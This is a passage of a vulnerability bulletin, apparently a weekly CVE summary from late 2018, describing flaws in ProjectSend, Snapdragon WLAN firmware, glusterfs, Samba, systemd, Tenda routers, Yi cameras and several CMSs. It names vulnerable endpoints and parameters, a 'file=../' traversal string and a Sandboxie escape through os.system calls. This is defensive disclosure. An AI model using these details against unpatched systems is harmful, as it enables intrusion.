    projectsend -- r582ProjectSend (formerly cFTP) r582 allows authentication bypass via a direct request for users.php, home.php, edit-file.php?file_id=1, or process-zip-download.php, or add_user_form_* parameters to users-add.php.2018-10-29not yet calculatedCVE-2016-10732
    MISC
    projectsend -- r582ProjectSend (formerly cFTP) r582 allows directory traversal via file=../ in the process-zip-download.php query string.2018-10-29not yet calculatedCVE-2016-10733
    MISC
    projectsend -- r582ProjectSend (formerly cFTP) r582 allows Insecure Direct Object Reference via includes/actions.log.export.php.2018-10-29not yet calculatedCVE-2016-10734
    MISC
    projectsend -- r582
     
    ProjectSend (formerly cFTP) r582 allows SQL injection via manage-files.php with the request parameter status, manage-files.php with the request parameter files, clients.php with the request parameter selected_clients, clients.php with the request parameter status, process-zip-download.php with the request parameter file, or home-log.php with the request parameter action.2018-10-29not yet calculatedCVE-2016-10731
    MISC
    python-kdcproxy -- python-kdcproxy
     
    python-kdcproxy before 0.3.2 allows remote attackers to cause a denial of service via a large POST request.2018-10-30not yet calculatedCVE-2015-5159
    CONFIRM
    CONFIRM
    qemu -- qemu
     
    An OOB heap buffer r/w access issue was found in the NVM Express Controller emulation in QEMU. It could occur in nvme_cmb_ops routines in nvme device. A guest user/process could use this flaw to crash the QEMU process resulting in DoS or potentially run arbitrary code with privileges of the QEMU process.2018-11-02not yet calculatedCVE-2018-16847
    CONFIRM
    MISC
    MLIST
    qualcomm -- snapdragonImproper input validation leads to buffer overwrite in the WLAN function that handles WMI commands in Snapdragon Mobile in version SD 835, SD 845, SD 850. 2018-10-29not yet calculatedCVE-2018-11856
    CONFIRM
    qualcomm -- snapdragonImproper input validation leads to buffer overwrite in the WLAN function that handles WLAN roam buffer in Snapdragon Mobile in version SD 845.2018-10-29not yet calculatedCVE-2018-11873
    CONFIRM
    qualcomm -- snapdragonInteger overflow may happen when calculating an internal structure size due to lack of validation of the input length in Snapdragon Mobile, Snapdragon Wear in version MDM9206, MDM9607, MDM9650, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 450, SD 625, SD 835, SD 845, SD 850, SDA660, SDM429, SDM439, SDM630, SDM632, SDM636, SDM660, SDM710, Snapdragon_High_Med_2016.2018-10-29not yet calculatedCVE-2018-11865
    CONFIRM
    qualcomm -- snapdragonImproper input validation leads to buffer overwrite in the WLAN function that handles WMI commands in Snapdragon Mobile in version SD 845, SD 850, SDA6602018-10-29not yet calculatedCVE-2018-11872
    CONFIRM
    qualcomm -- snapdragonBuffer overwrite can happen in WLAN function while processing set pdev parameter command due to lack of input validation in Snapdragon Automobile, Snapdragon Mobile, Snapdragon Wear in version IPQ4019, IPQ8064, IPQ8074, MDM9206, MDM9607, MDM9635M, MDM9640, MDM9650, MSM8996AU, QCA6174A, QCA6564, QCA6574, QCA6574AU, QCA6584, QCA6584AU, QCA9377, QCA9378, QCA9379, QCA9531, QCA9558, QCA9563, QCA9880, QCA9886, QCA9980, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 450, SD 600, SD 625, SD 650/52, SD 820, SD 820A, SD 835, SD 845, SD 850, SDA660, SDM630, SDM632, SDM636, SDM660, SDM710, SDX20, Snapdragon_High_Med_2016.2018-10-29not yet calculatedCVE-2018-11871
    CONFIRM
    qualcomm -- snapdragonBuffer overwrite can occur when the legacy rates count received from the host is not checked against the maximum number of legacy rates in Snapdragon Automobile, Snapdragon Mobile, Snapdragon Wear in version MDM9206, MDM9607, MDM9635M, MDM9640, MDM9650, MSM8996AU, QCA4531, QCA6174A, QCA6574AU, QCA6584, QCA6584AU, QCA9377, QCA9378, QCA9379, SD 210/SD 212/SD 205, SD 425, SD 600, SD 625, SD 650/52, SD 810, SD 820, SD 820A, SD 835, SD 845, SD 850, SDA660, SDX20.2018-10-29not yet calculatedCVE-2018-11870
    CONFIRM
    qualcomm -- snapdragonLack of buffer length check before copying in WLAN function while processing FIPS event, can lead to a buffer overflow in Snapdragon Mobile in version SD 845.2018-10-29not yet calculatedCVE-2018-11867
    CONFIRM
    qualcomm -- snapdragonInteger overflow may happen in WLAN when calculating an internal structure size due to lack of validation of the input length in Snapdragon Mobile, Snapdragon Wear in version IPQ8074, MDM9206, MDM9607, MDM9650, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 450, SD 625, SD 835, SD 845, SD 850, SDA660, SDM429, SDM439, SDM630, SDM632, SDM636, SDM660, SDM710, Snapdragon_High_Med_2016.2018-10-29not yet calculatedCVE-2018-11866
    CONFIRM
    qualcomm -- snapdragonWhen processing IE set command, buffer overwrite may occur due to lack of input validation of the IE length in Snapdragon Mobile in version SD 835, SD 845, SD 850.2018-10-29not yet calculatedCVE-2018-11858
    CONFIRM
    qualcomm -- snapdragonBuffer overflow can happen in WLAN module due to lack of validation of the input length in Snapdragon Mobile in version SD 845, SD 850, SDA660.2018-10-29not yet calculatedCVE-2018-11862
    CONFIRM
    qualcomm -- snapdragonBuffer overflow can happen in WLAN function due to lack of validation of the input length in Snapdragon Mobile in version SD 845, SD 850, SDA660.2018-10-29not yet calculatedCVE-2018-11861
    CONFIRM
    qualcomm -- snapdragonBuffer overwrite can happen in WLAN due to lack of validation of the input length in Snapdragon Mobile in version SD 845, SD 850.2018-10-29not yet calculatedCVE-2018-11859
    CONFIRM
    qualcomm -- snapdragonImproper input validation in WLAN encrypt/decrypt module can lead to a buffer copy in Snapdragon Mobile in version SD 835, SD 845, SD 8502018-10-29not yet calculatedCVE-2018-11857
    CONFIRM
    qualcomm -- snapdragonLack of check of buffer size before copying in a WLAN function can lead to a buffer overflow in Snapdragon Mobile in version SD 845, SD 850.2018-10-29not yet calculatedCVE-2018-11875
    CONFIRM
    qualcomm -- snapdragonLack of input validation while copying to buffer in WLAN will lead to a buffer overflow in Snapdragon Mobile in version SD 835, SD 845, SD 850, SDA660.2018-10-29not yet calculatedCVE-2018-11876
    CONFIRM
    qualcomm -- snapdragonBuffer overflow if the length of passphrase is more than 32 when setting up secure NDP connection in Snapdragon Mobile in version SD 835, SD 845, SD 850, SDA660.2018-10-29not yet calculatedCVE-2018-11874
    CONFIRM
    qualcomm -- snapdragonIncorrect bound check can lead to potential buffer overwrite in WLAN controller in Snapdragon Mobile in version SD 835, SD 845, SD 850, SDA660.2018-10-29not yet calculatedCVE-2018-11882
    CONFIRM
    qualcomm -- snapdragonWhen the buffer length passed is very large, bounds check could be bypassed leading to potential buffer overwrite in Snapdragon Mobile in version SD 8452018-10-29not yet calculatedCVE-2018-11879
    CONFIRM
    qualcomm -- snapdragonImproper input validation leads to buffer overflow while processing network list offload command in WLAN function in Snapdragon Mobile in version SD 835, SD 845, SD 850, SDA6602018-10-29not yet calculatedCVE-2018-11884
    CONFIRM
    qualcomm -- snapdragonIncorrect bound check can lead to potential buffer overwrite in WLAN function in Snapdragon Mobile in version SD 835, SD 845, SD 850, SDA660.2018-10-29not yet calculatedCVE-2018-11880
    CONFIRM
    qualcomm -- snapdragonWhen the buffer length passed is very large in WLAN, bounds check could be bypassed leading to potential buffer overwrite in Snapdragon Mobile in version SD 835, SD 845, SD 850, SDA660.2018-10-29not yet calculatedCVE-2018-11877
    CONFIRM
    qualcomm -- snapdragonA micro-core of QMP transportation may cause a macro-core to read from or write to arbitrary memory in Snapdragon Mobile in version SD 845, SD 850.2018-10-26not yet calculatedCVE-2017-18309
    SECTRACK
    CONFIRM
    qualcomm -- snapdragonA bool variable in Video function, which gets typecasted to int before being read could result in an out of bound read access in all Android releases from CAF using the linux kernel2018-10-29not yet calculatedCVE-2017-18281
    SECTRACK
    CONFIRM
    qualcomm -- snapdragonModem segments are unlocked after authentication, leaving modem segments open to all in Snapdragon Mobile, Snapdragon Wear in version MDM9607, MSM8909W, SD 210/SD 212/SD 205, SD 425, SD 4302018-10-26not yet calculatedCVE-2017-18308
    SECTRACK
    CONFIRM
    qualcomm -- snapdragonClientEnv exposes services 0-32 to HLOS in Snapdragon Automobile, Snapdragon Mobile, Snapdragon Wear in version MSM8909W, MSM8996AU, SD 210/SD 212/SD 205, SD 410/12, SD 425, SD 427, SD 430, SD 435, SD 450, SD 615/16/SD 415, SD 617, SD 625, SD 650/52, SD 810, SD 820, SD 820A, SD 835, SD 845, SDA660, SDM429, SDM439, SDM630, SDM632, SDM636, SDM660, Snapdragon_High_Med_20162018-10-26not yet calculatedCVE-2017-18310
    SECTRACK
    CONFIRM
    qualcomm -- snapdragonWhen a series of FDAL messages are sent to the modem, a Use After Free condition can occur in Snapdragon Automobile, Snapdragon Mobile, Snapdragon Wear in version MDM9206, MDM9607, MDM9640, MDM9650, MSM8909W, MSM8996AU, SD 210/SD 212/SD 205, SD 425, SD 430, SD 450, SD 615/16/SD 415, SD 617, SD 625, SD 650/52, SD 820, SD 820A, SD 835, SD 845, SDA660, SDX20.2018-10-26not yet calculatedCVE-2018-11305
    SECTRACK
    CONFIRM
    redhat -- cloudforms_management_engine
     
    A code injection flaw was found in the way capacity and utilization imported control files are processed. A remote, authenticated attacker with access to the capacity and utilization feature could use this flaw to execute arbitrary code as the user CFME runs as.2018-10-31not yet calculatedCVE-2016-5402
    REDHAT
    BID
    CONFIRM
    redhat -- glusterfsIt was found that usage of snprintf function in feature/locks translator of glusterfs server 3.8.4, as shipped with Red Hat Gluster Storage, was vulnerable to a format string attack. A remote, authenticated attacker could use this flaw to cause remote denial of service.2018-10-31not yet calculatedCVE-2018-14661
    REDHAT
    REDHAT
    CONFIRM
    redhat -- glusterfsA flaw was found in glusterfs server through versions 4.1.4 and 3.1.2 which allowed repeated usage of GF_META_LOCK_KEY xattr. A remote, authenticated attacker could use this flaw to create multiple locks for single inode by using setxattr repetitively resulting in memory exhaustion of glusterfs server node.2018-11-01not yet calculatedCVE-2018-14660
    REDHAT
    REDHAT
    CONFIRM
    redhat -- glusterfsThe Gluster file system through versions 4.1.4 and 3.1.2 is vulnerable to a denial of service attack via use of the 'GF_XATTR_IOSTATS_DUMP_KEY' xattr. A remote, authenticated attacker could exploit this by mounting a Gluster volume and repeatedly calling 'setxattr(2)' to trigger a state dump and create an arbitrary number of files in the server's runtime directory.2018-10-31not yet calculatedCVE-2018-14659
    REDHAT
    REDHAT
    CONFIRM
    redhat -- glusterfsThe Gluster file system through versions 3.12 and 4.1.4 is vulnerable to a buffer overflow in the 'features/index' translator via the code handling the 'GF_XATTR_CLRLK_CMD' xattr in the 'pl_getxattr' function. A remote authenticated attacker could exploit this on a mounted volume to cause a denial of service.2018-10-31not yet calculatedCVE-2018-14652
    REDHAT
    REDHAT
    CONFIRM
    redhat -- glusterfsThe Gluster file system through version 4.1.4 is vulnerable to abuse of the 'features/index' translator. A remote attacker with access to mount volumes could exploit this via the 'GF_XATTROP_ENTRY_IN_KEY' xattrop to create arbitrary, empty files on the target server.2018-10-31not yet calculatedCVE-2018-14654
    REDHAT
    REDHAT
    CONFIRM
    redhat -- glusterfsThe Gluster file system through versions 4.1.4 and 3.12 is vulnerable to a heap-based buffer overflow in the '__server_getspec' function via the 'gf_getspec_req' RPC message. A remote authenticated attacker could exploit this to cause a denial of service or other potential unspecified impact.2018-10-31not yet calculatedCVE-2018-14653
    REDHAT
    REDHAT
    CONFIRM
    redhat -- glusterfs
     
    It was found that the fix for CVE-2018-10927, CVE-2018-10928, CVE-2018-10929, CVE-2018-10930, and CVE-2018-10926 was incomplete. A remote, authenticated attacker could use one of these flaws to execute arbitrary code, create arbitrary files, or cause denial of service on glusterfs server nodes via symlinks to relative paths.2018-10-31not yet calculatedCVE-2018-14651
    REDHAT
    REDHAT
    CONFIRM
    redhat -- openstack_platform
     
    A permissions flaw was found in redis, which sets weak permissions on certain files and directories that could potentially contain sensitive information. A local, unprivileged user could possibly use this flaw to access unauthorized system information.2018-10-31not yet calculatedCVE-2016-2121
    BID
    REDHAT
    CONFIRM
    ruby -- loofah_gem
     
    In the Loofah gem for Ruby, through v2.2.2, unsanitized JavaScript may occur in sanitized output when a crafted SVG element is republished.2018-10-30not yet calculatedCVE-2018-16468
    MISC
    s-cms -- s-cms
     
    S-CMS PHP 1.0 has SQL injection in member/member_news.php via the type parameter (aka the $N_type field).2018-10-31not yet calculatedCVE-2018-18887
    MISC
    samba -- sambaIt was found that Samba before versions 4.5.3, 4.4.8, 4.3.13 always requested forwardable tickets when using Kerberos authentication. A service to which Samba authenticated using Kerberos could subsequently use the ticket to impersonate Samba to other services or domain users.2018-10-31not yet calculatedCVE-2016-2125
    REDHAT
    REDHAT
    REDHAT
    REDHAT
    BID
    SECTRACK
    REDHAT
    CONFIRM
    CONFIRM
    samba -- samba
     
    A flaw was found in samba versions 4.0.0 to 4.5.2. The Samba routine ndr_pull_dnsp_name contains an integer wrap problem, leading to an attacker-controlled memory overwrite. ndr_pull_dnsp_name parses data from the Samba Active Directory ldb database. Any user who can write to the dnsRecord attribute over LDAP can trigger this memory corruption. By default, all authenticated LDAP users can write to the dnsRecord attribute on new DNS objects. This makes the defect a remote privilege escalation.2018-11-01not yet calculatedCVE-2016-2123
    BID
    SECTRACK
    CONFIRM
    CONFIRM
    sandboxie -- sandboxie
     
    Sandboxie 5.26 allows a Sandbox Escape via an "import os" statement, followed by os.system("cmd") or os.system("powershell"), within a .py file.2018-10-29not yet calculatedCVE-2018-18748
    MISC
    schneider_electric -- modicon_m221
     
    A Insufficient Verification of Data Authenticity (CWE-345) vulnerability exists in the Modicon M221, all versions, which could cause a change of IPv4 configuration (IP address, mask and gateway) when remotely connected to the device.2018-11-02not yet calculatedCVE-2018-7798
    CONFIRM
    schneider_electric -- schneider_electric_software_updateA DLL hijacking vulnerability exists in Schneider Electric Software Update (SESU), all versions prior to V2.2.0, which could allow an attacker to execute arbitrary code on the targeted system when placing a specific DLL file.2018-11-02not yet calculatedCVE-2018-7799
    MISC
    CONFIRM
    semcms -- semcmsXSS was discovered in SEMCMS PHP V3.4 via the SEMCMS_SeoAndTag.php?Class=edit&CF=SeoAndTag tag_indexkey parameter.2018-10-30not yet calculatedCVE-2018-18841
    MISC
    semcms -- semcmsAn XSS issue was discovered in SEMCMS 3.4 via the first input field to the admin/SEMCMS_Link.php?lgid=1 URI.2018-10-29not yet calculatedCVE-2018-18740
    MISC
    semcms -- semcmsAn XSS issue was discovered in SEMCMS 3.4 via the second text field to the admin/SEMCMS_Categories.php?pid=1&lgid=1 URI.2018-10-29not yet calculatedCVE-2018-18743
    MISC
    semcms -- semcmsAn XSS issue was discovered in SEMCMS 3.4 via the fifth text box to the admin/SEMCMS_Main.php URI.2018-10-29not yet calculatedCVE-2018-18744
    MISC
    semcms -- semcmsAn XSS issue was discovered in SEMCMS 3.4 via admin/SEMCMS_Menu.php?lgid=1 during editing.2018-10-29not yet calculatedCVE-2018-18745
    MISC
    semcms -- semcmsAn XSS issue was discovered in SEMCMS 3.4 via admin/SEMCMS_Download.php?lgid=1 during editing.2018-10-29not yet calculatedCVE-2018-18741
    MISC
    semcms -- semcmsAn XSS issue was discovered in SEMCMS 3.4 via the admin/SEMCMS_Products.php?lgid=1 Keywords field.2018-10-29not yet calculatedCVE-2018-18739
    MISC
    semcms -- semcmsA CSRF issue was discovered in SEMCMS 3.4 via the admin/SEMCMS_User.php?Class=add&CF=user URI.2018-10-29not yet calculatedCVE-2018-18742
    MISC
    semcms -- semcms
     
    XSS was discovered in SEMCMS V3.4 via the semcms_remail.php?type=ok umail parameter.2018-10-29not yet calculatedCVE-2018-18783
    MISC
    semcms -- semcms
     
    XSS was discovered in SEMCMS PHP V3.4 via the SEMCMS_SeoAndTag.php?Class=edit&CF=SeoAndTag tag_indexmetatit parameter.2018-10-30not yet calculatedCVE-2018-18840
    MISC
    semcms -- semcms
     
    An XSS issue was discovered in SEMCMS 3.4 via the admin/SEMCMS_Categories.php?pid=1&lgid=1 category_key parameter.2018-10-29not yet calculatedCVE-2018-18738
    MISC
    spray-json -- spray-json
     
    Lightbend Spray spray-json through 1.3.4 allows remote attackers to cause a denial of service (resource consumption) because of Algorithmic Complexity during the parsing of many JSON object fields (with keys that have the same hash code).2018-10-31not yet calculatedCVE-2018-18854
    MISC
    spray-json -- spray-json
     
    Lightbend Spray spray-json through 1.3.4 allows remote attackers to cause a denial of service (resource consumption) because of Algorithmic Complexity during the parsing of a field composed of many decimal digits.2018-10-31not yet calculatedCVE-2018-18853
    MISC
    synology -- diskstation_manager
     
    Information exposure vulnerability in SYNO.Core.ACL in Synology DiskStation Manager (DSM) before 6.2-23739-2 allows remote authenticated users to determine the existence and obtain the metadata of arbitrary files via the file_path parameter.2018-10-31not yet calculatedCVE-2018-13281
    CONFIRM
    synology -- photo_station
     
    Session fixation vulnerability in SYNO.PhotoStation.Auth in Synology Photo Station before 6.8.7-3481 allows remote attackers to hijack web sessions via the PHPSESSID parameter.2018-10-31not yet calculatedCVE-2018-13282
    CONFIRM
    systemd -- systemdA vulnerability in unit_deserialize of systemd allows an attacker to supply arbitrary state across systemd re-execution via NotifyAccess. This can be used to improperly influence systemd execution and possibly lead to root privilege escalation. Affected releases are systemd versions up to and including 239.2018-10-26not yet calculatedCVE-2018-15686
    BID
    MISC
    GENTOO
    EXPLOIT-DB
    systemd -- systemd
     
    A race condition in chown_one() of systemd allows an attacker to cause systemd to set arbitrary permissions on arbitrary files. Affected releases are systemd versions up to and including 239.2018-10-26not yet calculatedCVE-2018-15687
    BID
    MISC
    GENTOO
    EXPLOIT-DB
    systemd -- systemd
     
    A buffer overflow vulnerability in the dhcp6 client of systemd allows a malicious dhcp6 server to overwrite heap memory in systemd-networkd. Affected releases are systemd: versions up to and including 239.2018-10-26not yet calculatedCVE-2018-15688
    BID
    MISC
    GENTOO
    tecrail -- responsive_filemanager
     
    An SSRF issue was discovered in tecrail Responsive FileManager 9.13.4 via the upload.php url parameter. NOTE: this issue exists because of an incomplete fix for CVE-2018-15495.2018-10-31not yet calculatedCVE-2018-18867
    MISC
    tenda -- multiple_productsAn issue was discovered on Tenda AC9 V15.03.05.19(6318)_CN, AC15 V15.03.05.19_CN, and AC18 V15.03.05.19(6318)_CN devices. They allow remote code execution via shell metacharacters in the usbName field to the __fastcall function with a POST request.2018-10-29not yet calculatedCVE-2018-18728
    MISC
    tenda -- multiple_productsAn issue was discovered on Tenda AC7 V15.03.06.44_CN, AC9 V15.03.05.19(6318)_CN, AC10 V15.03.06.23_CN, AC15 V15.03.05.19_CN, and AC18 V15.03.05.19(6318)_CN devices. It is a buffer overflow vulnerability in the router's web server -- httpd. When processing the "firewallEn" parameter for a post request, the value is directly used in a strcpy to a local variable placed on the stack, which overrides the return address of the function.2018-10-29not yet calculatedCVE-2018-18709
    MISC
    tenda -- multiple_productsAn issue was discovered on Tenda AC7 V15.03.06.44_CN, AC9 V15.03.05.19(6318)_CN, AC10 V15.03.06.23_CN, AC15 V15.03.05.19_CN, and AC18 V15.03.05.19(6318)_CN devices. There is a buffer overflow vulnerability in the router's web server -- httpd. While processing the 'ntpServer' parameter for a post request, the value is directly used in a strcpy to a local variable placed on the stack, which overrides the return address of the function.2018-10-29not yet calculatedCVE-2018-18732
    MISC
    tenda -- multiple_productsAn issue was discovered on Tenda AC7 V15.03.06.44_CN, AC9 V15.03.05.19(6318)_CN, AC10 V15.03.06.23_CN, AC15 V15.03.05.19_CN, and AC18 V15.03.05.19(6318)_CN devices. There is a buffer overflow vulnerability in the router's web server -- httpd. While processing the 'deviceMac' parameter for a post request, the value is directly used in a sprintf to a local variable placed on the stack, which overrides the return address of the function.2018-10-29not yet calculatedCVE-2018-18731
    MISC
    tenda -- multiple_productsAn issue was discovered on Tenda AC7 V15.03.06.44_CN, AC9 V15.03.05.19(6318)_CN, AC10 V15.03.06.23_CN, AC15 V15.03.05.19_CN, and AC18 V15.03.05.19(6318)_CN devices. There is a buffer overflow vulnerability in the router's web server -- httpd. While processing the 'startIp' and 'endIp' parameters for a post request, each value is directly used in a sprintf to a local variable placed on the stack, which overrides the return address of the function.2018-10-29not yet calculatedCVE-2018-18730
    MISC
    tenda -- multiple_productsAn issue was discovered on Tenda AC7 V15.03.06.44_CN, AC9 V15.03.05.19(6318)_CN, AC10 V15.03.06.23_CN, AC15 V15.03.05.19_CN, and AC18 V15.03.05.19(6318)_CN devices. There is a heap-based buffer overflow vulnerability in the router's web server -- httpd. While processing the 'mac' parameter for a post request, the value is directly used in a strcpy to a variable placed on the heap, which can leak sensitive information or even hijack program control flow.2018-10-29not yet calculatedCVE-2018-18729
    MISC
    tenda -- multiple_productsAn issue was discovered on Tenda AC7 V15.03.06.44_CN, AC9 V15.03.05.19(6318)_CN, AC10 V15.03.06.23_CN, AC15 V15.03.05.19_CN, and AC18 V15.03.05.19(6318)_CN devices. It is a buffer overflow vulnerability in the router's web server -- httpd. When processing the "page" parameter of the function "fromDhcpListClient" for a request, it is directly used in a sprintf to a local variable placed on the stack, which overrides the return address of the function.2018-10-29not yet calculatedCVE-2018-18706
    MISC
    tenda -- multiple_productsAn issue was discovered on Tenda AC7 V15.03.06.44_CN, AC9 V15.03.05.19(6318)_CN, AC10 V15.03.06.23_CN, AC15 V15.03.05.19_CN, and AC18 V15.03.05.19(6318)_CN devices. It is a buffer overflow vulnerability in the router's web server -- httpd. When processing the "ssid" parameter for a post request, the value is directly used in a strcpy to a local variable placed on the stack, which overrides the return address of the function.2018-10-29not yet calculatedCVE-2018-18707
    MISC
    tenda -- multiple_productsAn issue was discovered on Tenda AC7 V15.03.06.44_CN, AC9 V15.03.05.19(6318)_CN, AC10 V15.03.06.23_CN, AC15 V15.03.05.19_CN, and AC18 V15.03.05.19(6318)_CN devices. It is a buffer overflow vulnerability in the router's web server -- httpd. When processing the "page" parameter of the function "fromAddressNat" for a post request, the value is directly used in a sprintf to a local variable placed on the stack, which overrides the return address of the function.2018-10-29not yet calculatedCVE-2018-18708
    MISC
    tenda -- multiple_products
     
    An issue was discovered on Tenda AC7 V15.03.06.44_CN, AC9 V15.03.05.19(6318)_CN, AC10 V15.03.06.23_CN, AC15 V15.03.05.19_CN, and AC18 V15.03.05.19(6318)_CN devices. There is a buffer overflow vulnerability in the router's web server -- httpd. While processing the 'deviceList' parameter for a post request, the value is directly used in a strcpy to a local variable placed on the stack, which overrides the return address of the function.2018-10-29not yet calculatedCVE-2018-18727
    MISC
    tenda -- multiple_products
     
    An issue was discovered on Tenda AC7 devices with firmware through V15.03.06.44_CN(AC7), AC9 devices with firmware through V15.03.05.19(6318)_CN(AC9), and AC10 devices with firmware through V15.03.06.23_CN(AC10). A command Injection vulnerability allows attackers to execute arbitrary OS commands via a crafted goform/setUsbUnload request. This occurs because the "formsetUsbUnload" function executes a dosystemCmd function with untrusted input.2018-10-30not yet calculatedCVE-2018-14558
    MISC
    typecho -- typecho
     
    Typecho V1.1 allows remote attackers to send shell commands via base64-encoded serialized data, as demonstrated by SSRF.2018-10-29not yet calculatedCVE-2018-18753
    MISC
    vanilla -- vanilla
     
    Vanilla 2.6.x before 2.6.4 allows remote code execution.2018-11-03not yet calculatedCVE-2018-18903
    MISC
    MISC
    vecna -- vgo_robotVGo Robot (Versions 3.0.3.52164 and 3.0.3.53662. Prior versions may also be affected) connected to the VGo XAMPP. User accounts may be able to execute commands that are outside the scope of their privileges and within the scope of an admin account. If an attacker has access to VGo XAMPP Client credentials, they may be able to execute admin commands on the connected robot.2018-10-30not yet calculatedCVE-2018-17933
    MISC
    vecna -- vgo_robotIf an attacker has physical access to the VGo Robot (Versions 3.0.3.52164 and 3.0.3.53662. Prior versions may also be affected) they may be able to alter scripts, which may allow code execution with root privileges.2018-10-30not yet calculatedCVE-2018-17931
    MISC
    vecna -- vgo_robotIf an attacker has access to the firmware from the VGo Robot (Versions 3.0.3.52164 and 3.0.3.53662. Prior versions may also be affected) they may be able to extract credentials.2018-10-30not yet calculatedCVE-2018-8858
    MISC
    webiness -- inventory
     
    Webiness Inventory 2.3 suffers from an Arbitrary File upload vulnerability via PHP code in the protected/library/ajax/WsSaveToModel.php logo parameter.2018-10-29not yet calculatedCVE-2018-18752
    MISC
    wuzhi -- cmsAn issue was discovered in WUZHI CMS 4.1.0. There is a CSRF vulnerability that can change the super administrator's username via index.php?m=member&f=index&v=edit&uid=1.2018-10-29not yet calculatedCVE-2018-18712
    MISC
    wuzhi -- cms
     
    An issue was discovered in WUZHI CMS 4.1.0. There is a CSRF vulnerability that can change the super administrator's password via index.php?m=core&f=panel&v=edit_info.2018-10-29not yet calculatedCVE-2018-18711
    MISC
    xen -- xen
     
    An issue was discovered in Xen 4.9.x through 4.11.x, on Intel x86 platforms, allowing x86 HVM and PVH guests to cause a host OS denial of service (NULL pointer dereference) or possibly have unspecified other impact because nested VT-x is not properly restricted.2018-10-31not yet calculatedCVE-2018-18883
    SECTRACK
    MISC
    xheditor -- xheditor
     
    xhEditor 1.2.2 allows XSS via JavaScript code in the SRC attribute of an IFRAME element within the editor's source-code view.2018-11-03not yet calculatedCVE-2018-18909
    MISC
    yi -- home_camera_27usAn exploitable code execution vulnerability exists in the QR code scanning functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted QR Code can cause a buffer overflow, resulting in code execution. An attacker can make the camera scan a QR code to trigger this vulnerability. Alternatively, a user could be convinced to display a QR code from the internet to their camera, which could exploit this vulnerability.2018-11-01not yet calculatedCVE-2018-3900
    MISC
    yi -- home_camera_27usAn exploitable information disclosure vulnerability exists in the phone-to-camera communications of Yi Home Camera 27US 1.8.7.0D. An attacker can sniff network traffic to exploit this vulnerability.2018-11-01not yet calculatedCVE-2018-3947
    MISC
    yi -- home_camera_27usAn exploitable code execution vulnerability exists in the firmware update functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted set of UDP packets can cause a settings change, resulting in denial of service. An attacker can send a set of packets to trigger this vulnerability.2018-11-01not yet calculatedCVE-2018-3928
    MISC
    yi -- home_camera_27usAn exploitable code execution vulnerability exists in the firmware update functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted set of UDP packets can cause a logic flaw, resulting in an authentication bypass. An attacker can sniff network traffic and send a set of packets to trigger this vulnerability.2018-11-02not yet calculatedCVE-2018-3934
    MISC
    yi -- home_camera_27usAn exploitable code execution vulnerability exists in the firmware update functionality of the Yi Home Camera 27US 1.8.7.0D. A specially crafted 7-Zip file can cause a CRC collision, resulting in a firmware update and code execution. An attacker can insert an SDcard to trigger this vulnerability.2018-11-02not yet calculatedCVE-2018-3920
    MISC
    yi -- home_camera_27usAn exploitable code execution vulnerability exists in the UDP network functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted set of UDP packets can allocate unlimited memory, resulting in denial of service. An attacker can send a set of packets to trigger this vulnerability.2018-11-02not yet calculatedCVE-2018-3935
    MISC
    yi -- home_camera_27usAn exploitable code execution vulnerability exists in the cloud OTA setup functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted SSID can cause a command injection, resulting in code execution. An attacker can cause a camera to connect to this SSID to trigger this vulnerability. Alternatively, an attacker can convince a user to connect their camera to this SSID.2018-11-01not yet calculatedCVE-2018-3910
    MISC
    yi -- home_camera_27usAn exploitable code execution vulnerability exists in the firmware update functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted file can cause a logic flaw and command injection, resulting in code execution. An attacker can insert an SD card to trigger this vulnerability.2018-11-02not yet calculatedCVE-2018-3890
    MISC
    yi -- home_camera_27usAn exploitable firmware downgrade vulnerability exists in the firmware update functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted file can cause a logic flaw, resulting in a firmware downgrade. An attacker can insert an SD card to trigger this vulnerability.2018-11-02not yet calculatedCVE-2018-3891
    MISC
    yi -- home_camera_27usAn exploitable firmware downgrade vulnerability exists in the time syncing functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted packet can cause a buffer overflow, resulting in code execution. An attacker can intercept and alter network traffic to trigger this vulnerability.2018-11-02not yet calculatedCVE-2018-3892
    MISC
    yi -- home_camera_27usAn exploitable code execution vulnerability exists in the QR code scanning functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted QR Code can cause a buffer overflow, resulting in code execution. The trans_info call can overwrite a buffer of size 0x104, which is more than enough to overflow the return address from the ssid_dst field.2018-11-02not yet calculatedCVE-2018-3898
    MISC
    yi -- home_camera_27us
     
    An exploitable code execution vulnerability exists in the QR code scanning functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted QR Code can cause a buffer overflow, resulting in code execution. The trans_info call can overwrite a buffer of size 0x104, which is more than enough to overflow the return address from the password_dst field2018-11-02not yet calculatedCVE-2018-3899
    MISC
    yunucms -- yunucmsAn XSS issue was discovered in admin/banner/editbanner?id=20 in YUNUCMS 1.1.5.2018-10-29not yet calculatedCVE-2018-18725
    MISC
    yunucms -- yunucmsAn XSS issue was discovered in admin/link/editlink?id=5 in YUNUCMS 1.1.5.2018-10-29not yet calculatedCVE-2018-18721
    MISC
    yunucms -- yunucmsAn XSS issue was discovered in admin/content/editcontent?id=29&gopage=1 in YUNUCMS 1.1.5.2018-10-29not yet calculatedCVE-2018-18722
    MISC
    yunucms -- yunucmsAn XSS issue was discovered in index.php/admin/area/editarea/id/110000 in YUNUCMS 1.1.5.2018-10-29not yet calculatedCVE-2018-18723
    MISC
    yunucms -- yunucmsAn XSS issue was discovered in index.php/admin/category/editcategory?id=73 in YUNUCMS 1.1.5.2018-10-29not yet calculatedCVE-2018-18724
    MISC
    yunucms -- yunucmsAn XSS issue was discovered in admin/sitelink/editsitelink?id=16 in YUNUCMS 1.1.5.2018-10-29not yet calculatedCVE-2018-18726
    MISC
    yunucms -- yunucms
     
    An XSS issue was discovered in index.php/admin/system/basic in YUNUCMS 1.1.5.2018-10-29not yet calculatedCVE-2018-18720
    MISC
    z-blogphp -- z-blogphp
     
